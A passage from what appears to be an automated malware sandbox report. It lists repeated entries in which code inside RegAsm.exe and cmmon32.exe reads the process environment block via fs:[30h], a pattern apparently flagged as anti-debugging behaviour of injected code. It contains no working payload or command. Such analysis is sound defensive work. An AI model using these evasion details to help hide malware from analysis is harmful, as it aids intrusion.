          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C22073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C31074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B92990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BF41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B98E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C1FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B78794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C38F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BEA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0478746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04838CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0479BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_048214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h]
